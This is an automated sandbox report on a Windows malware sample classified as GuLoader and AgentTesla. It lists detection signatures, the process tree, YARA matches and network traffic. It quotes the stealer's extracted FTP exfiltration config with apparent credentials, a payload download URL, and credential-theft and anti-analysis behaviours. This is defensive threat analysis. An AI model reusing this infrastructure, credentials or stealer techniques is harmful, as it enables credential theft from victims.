Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6culQoI97a.exe

Overview

General Information

Sample Name:6culQoI97a.exe
Analysis ID:755473
MD5:d9aa122b8c39444799e60eabbab69502
SHA1:0175baf7a240c2050571a6df273a892e8b192d81
SHA256:317b5db72d7c43ab63caffa88412395a1b010d24f234eb1b7eeabc92105db143
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • 6culQoI97a.exe (PID: 9084 cmdline: C:\Users\user\Desktop\6culQoI97a.exe MD5: D9AA122B8C39444799E60EABBAB69502)
    • CasPol.exe (PID: 2424 cmdline: C:\Users\user\Desktop\6culQoI97a.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 2776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.gettoner.com.mx/droid@gettoner.com.mxfedxunited543@"}
SourceRuleDescriptionAuthorStrings
00000009.00000000.972511906.0000000000FB0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000002.00000002.1204047985.0000000002EC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
          • 0x30f14:$s10: logins
          • 0x46998:$s10: logins
          • 0x4fe48:$s11: credential
          • 0x1e1e:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time
          • 0x2346:$m2: %image/jpg:Zone.Identifier\tmpG.tmp%urlkey%-f \Data\Tor\torrcp=%PostURL%127.0.0.1POST+%2B
          • 0x2892:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
          Click to see the 3 entries
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 6culQoI97a.exeReversingLabs: Detection: 73%
          Source: 6culQoI97a.exeVirustotal: Detection: 56%Perma Link
          Source: ftp://ftp.gettoner.com.mx/droidAvira URL Cloud: Label: malware
          Source: http://195.178.120.24/mhpgXW188.chmAvira URL Cloud: Label: malware
          Source: 6culQoI97a.exe.9084.2.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.gettoner.com.mx/droid@gettoner.com.mxfedxunited543@"}
          Source: 6culQoI97a.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 6culQoI97a.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_00406448 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_004027A1 FindFirstFileA,
          Source: Joe Sandbox ViewIP Address: 195.178.120.24 195.178.120.24
          Source: global trafficHTTP traffic detected: GET /mhpgXW188.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 195.178.120.24Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.gettoner.com.mx/droid
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 00000009.00000002.5786454694.0000000001396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.178.120.24/mhpgXW188.chm
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://NwSpLV.com
          Source: 6culQoI97a.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 6culQoI97a.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: global trafficHTTP traffic detected: GET /mhpgXW188.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 195.178.120.24Cache-Control: no-cache
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_00405339 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          System Summary

          barindex
          Source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: Process Memory Space: CasPol.exe PID: 2424, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 6culQoI97a.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: Process Memory Space: CasPol.exe PID: 2424, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\6culQoI97a.exeFile created: C:\Windows\resources\0409Jump to behavior
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_73DD1A98
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EDEC82
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EE02EE
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC76FF
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECB2CF
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC72DB
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC76BA
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECBE84
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC6E7B
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC824F
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC6E46
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EDEE46
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC6E47
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECBA0D
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECB3F8
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECB7CA
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC73A9
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC6FA3
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC73BD
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EE3FBA
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EE137C
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EE0B71
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC8B4B
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EE433C
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECB4E3
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC70C8
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC88D9
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC8841
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ED2824
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC7801
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC35EB
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC71EB
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC89FD
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC85F3
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECA9A0
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECB1B5
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC359E
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EE0997
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECB17E
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EE1D76
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECBD71
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECBD09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_011DDD83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_011DE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_011DB025
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_011D83E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_011D4928
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_011DA0D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_011D1BD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0124C510
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01244168
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_012455E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0124D8F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01246790
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_012496F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01243179
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_012425E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_012437B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D445D08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D444EF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D4469D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D444374
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D445C41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D4469F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1F88BE70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1F884320
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1F88B110
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1F881130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1F883708
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1F883A50
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EE3AF0 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EE2B7C NtProtectVirtualMemory,
          Source: C:\Users\user\Desktop\6culQoI97a.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
          Source: 6culQoI97a.exeReversingLabs: Detection: 73%
          Source: 6culQoI97a.exeVirustotal: Detection: 56%
          Source: C:\Users\user\Desktop\6culQoI97a.exeFile read: C:\Users\user\Desktop\6culQoI97a.exeJump to behavior
          Source: 6culQoI97a.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\6culQoI97a.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\6culQoI97a.exe C:\Users\user\Desktop\6culQoI97a.exe
          Source: C:\Users\user\Desktop\6culQoI97a.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\6culQoI97a.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\6culQoI97a.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\6culQoI97a.exe
          Source: C:\Users\user\Desktop\6culQoI97a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\6culQoI97a.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\BrackerJump to behavior
          Source: C:\Users\user\Desktop\6culQoI97a.exeFile created: C:\Users\user\AppData\Local\Temp\nskC4E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/4@0/1
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\6culQoI97a.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_004045EA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2776:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2776:304:WilStaging_02
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: 6culQoI97a.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000009.00000000.972511906.0000000000FB0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1204047985.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_73DD2F60 push eax; ret
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC514F push edi; ret
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC9AEB pushad ; retf
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC56C8 push ds; ret
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC3ACA push esp; iretd
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECC658 push cs; ret
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC4BE4 push 6B8BC5CBh; retf
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC3FB0 push ss; ret
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC537B push edi; ret
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC24CD push esp; ret
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC145C pushad ; ret
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC517A push edi; ret
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC4D44 push ebx; retf
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECC13C pushfd ; retn BE8Dh
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0124142F push edi; retn 0000h
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D444C51 push ds; ret
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_73DD1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\user\Desktop\6culQoI97a.exeFile created: C:\Users\user\AppData\Local\Temp\nspCBC.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\6culQoI97a.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
